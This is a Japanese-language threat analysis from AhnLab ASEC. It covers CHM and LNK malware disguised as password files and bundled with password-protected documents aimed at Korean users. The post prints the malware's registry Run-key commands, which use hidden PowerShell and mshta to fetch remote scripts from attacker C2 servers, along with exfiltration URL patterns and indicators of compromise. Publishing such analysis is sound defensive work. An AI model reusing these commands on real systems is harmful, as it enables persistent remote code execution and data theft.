AhnLab Security Emergency response Center (ASEC)は先月、パスワードファイルに偽装して正常なドキュメントファイルとともに圧縮ファイルで拡散しているマルウェアを確認した。このタイプのマルウェアは、正常なドキュメントファイルと一緒に配布されるため、ユーザーが不正なファイルであることを認知するのが難しい。最近確認されたマルウェアは CHM と LNK 形式で、CHM の場合、以下で紹介したマルウェアと同じタイプであり、同じ攻撃グループが製作したものとみられる。
CHM と LNK ファイルはすべて暗号が設定された正常なドキュメントファイルと一緒に圧縮されて配布されたと推定される。Excel およびアレアハングルの場合、暗号が設定されており、ユーザーに暗号が書かれていると思われる CHM および LNK ファイルを実行するように誘導する。
図1.圧縮ファイルの内部
2つのタイプはすべて同じ形態で配布されるが、最終的に実行される不正な振る舞いから見て、それぞれ違うグループが製作したものと推定される。
- CHM タイプ
[図1]で確認された passwd.chm もしくは Password.chm 実行時、ドキュメントファイルの暗号が表示され、内部に存在する不正なスクリプトが実行される。
図2.passwd.chm 実行時に確認されるヘルプ
図3.暗号解除時に表示される「靴.xlsx」ドキュメントの内容
図4.Password.chm 実行時に確認されるヘルプ
図5.暗号解除時に表示される「2020_normal_ko.hwp」ドキュメントの内容
CHM ファイルで確認される不正なスクリプトは、以下のように mshta プロセスを通して不正な url に存在する追加のスクリプトを実行する。
図6.CHM 内の不正なスクリプト
mshta プロセスを通して実行された追加スクリプトは< 韓国国内の金融企業セキュリティメールを詐称した CHM マルウェア : RedEyes(ScarCruft) >で紹介したコマンドと同じ形態である。実行時、RUN キーの登録、攻撃者サーバーからのコマンドの受信、コマンド実行結果の伝達の機能を担っている。
図7.1.html で確認される不正なスクリプト
- RUN キーの登録
レジストリのパス : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
値名 : icxrNpVd
値 : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html - C2
攻撃者のコマンド受信 – hxxp://shacc[.]kr/skin/product/mid.php?U=[コンピューター名]+[ユーザー名]
コマンド実行結果の伝達 – hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64 でエンコード]
図8.11.html で確認される不正なスクリプト
- RUN キーの登録
レジストリのパス : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
値名 : aeF
値 : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html - C2
攻撃者のコマンド受信 – hxxp://141.105.65.165/data//mid.php?U=[コンピューター名]+[ユーザー名]
コマンド実行結果の伝達 – hxxp://141.105.65.165/data/mid.php?R=[BASE64 でエンコード]
- LNK タイプ
[図1]で確認された password.txt.lnk ファイルは、実行時に %temp% フォルダーに暗号が書かれたテキストファイルと不正なスクリプトファイルを生成する。
図9.生成された追加スクリプトおよび password.txt ファイル
図10.暗号解除時に表示される「個人情報利用同意書.hwp」ドキュメントの内容
VBS ファイルは以下のように hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1 に存在する追加の不正なスクリプトを実行する機能を担っている。
図11.生成された VBS ファイル
この URL 形式を見ると、LNK タイプの場合、以下のブログで紹介したマルウェアと類似しており、同じ攻撃グループが製作したものと思われる。
このタイプのマルウェアは攻撃者の意図に応じて様々な不正な振る舞いを実行することができる。また、様々な攻撃グループで正常なファイルと一緒に拡散する方式で使用されており、現在確認された CHM と LNK ファイル以外にも様々な形態のマルウェアが存在することが予想される。このように様々な形式のマルウェアが韓国国内のユーザーを対象に配布されており、ユーザーはメールを受信した際は送信者を必ず確認して、添付ファイルの実行は特に注意しなければならない。
[ファイル検知]
Trojan/CHM.Agent (2023.03.08.03)
Dropper/LNK.Agent (2023.02.28.00)
[IOC]
MD5
809528921de39530de59e3793d74af98 – CHM
b39182a535f41699280ca088eef0f258 – CHM
2b79e2bd6548118c942480a52b5a1669 – LNK
C2
hxxp://shacc.kr/skin/product/1.html
hxxp://141.105.65.165/data/11.html
hxxp://hondes.getenjoyment.net/denak/info/list.php?query=1
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories: マルウェアの情報